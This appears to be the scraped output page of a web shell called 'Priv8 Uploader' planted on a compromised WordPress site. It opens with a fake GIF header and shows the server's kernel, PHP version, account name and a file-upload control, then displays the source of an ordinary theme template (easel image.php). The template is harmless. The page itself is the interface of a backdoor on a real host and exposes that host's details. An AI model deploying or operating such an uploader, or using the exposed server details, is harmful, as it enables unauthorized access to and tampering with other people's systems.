GIF89a;
Notice: Undefined index: in /home/bs3263/domains/poolq.ee/public_html/wp-content/plugins/classic-editor/classic-editor.php on line 3

Priv8 Uploader By InMyMine7

Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
HEX
HEX
Server: Apache/2
System: Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
User: bs3263 (524)
PHP: 7.3.5
Disabled: NONE
Upload Files
File: /home/bs3263/domains/poolq.ee/old_old/wp-content/themes/easel/image.php
<?php get_header();  ?>

	<?php if (have_posts()) : while (have_posts()) : the_post() ?>
	<div <?php post_class(); ?>>
		<?php easel_display_post_thumbnail(); ?>
		<div class="post-head"></div>
		<div class="post-content">
			<div class="imagenav-wrap">
				<div class="imagenav-left">
					<div class="imagenav-bg">
						<?php previous_image_link(); ?>
					</div>
					<div class="imagenav-arrow">
						&lsaquo;
					</div>
					<div class="imagenav-link">
						<?php previous_image_link() ?>
					</div>
				</div>
				<div class="imagenav-center">
					<a href="<?php echo wp_get_attachment_url($post->ID) ?>" target="_blank" title="Click for full size." class="imagetitle"><?php the_title() ?></a><br />
					<a href="<?php echo get_permalink($post->post_parent) ?>" rev="attachment"><?php _e('&larr; Back to Gallery','easel'); ?></a>
				</div>
				<div class="imagenav-right">
					<div class="imagenav-bg">
						<?php next_image_link() ?>
					</div>
					<div class="imagenav-arrow">
						&rsaquo;
					</div>
					<div class="imagenav-link">
						<?php next_image_link() ?>
					</div>
				</div>					
				<div class="clear"></div>
			</div>
			<div class="clear"></div>
			<div class="gallery-image">
				<a href="<?php echo wp_get_attachment_url($post->ID) ?>" target="_blank" title="<?php _e('Click for full size.','easel'); ?>" ><img src="<?php echo wp_get_attachment_url($post->ID) ?>" alt="<?php the_title() ?>" /></a>
			</div>
			<div class="gallery-caption">
				<?php the_excerpt(); ?>
			</div>
			<div class="gallery-content">
				<?php the_content(); ?>
				<div class="clear"></div>
			</div>
			<div class="clear"></div>
		</div>
		<div class="post-foot"></div>
	</div>
	<?php edit_post_link(__('Edit this attachment.','easel'), '', ''); ?>
	<?php if ('open' == $post->comment_status) { comments_template('', true); } ?>
	<?php endwhile; else: ?>
	<div <?php post_class(); ?>>
		<div class="post-head"></div>
		<div class="post-content">
			<p><?php _e('Sorry, no image matched your criteria.','easel'); ?></p>
			<div class="clear"></div>
		</div>
		<div class="post-foot"></div>
	</div>
	<?php endif; ?>
	
<?php get_footer() ?>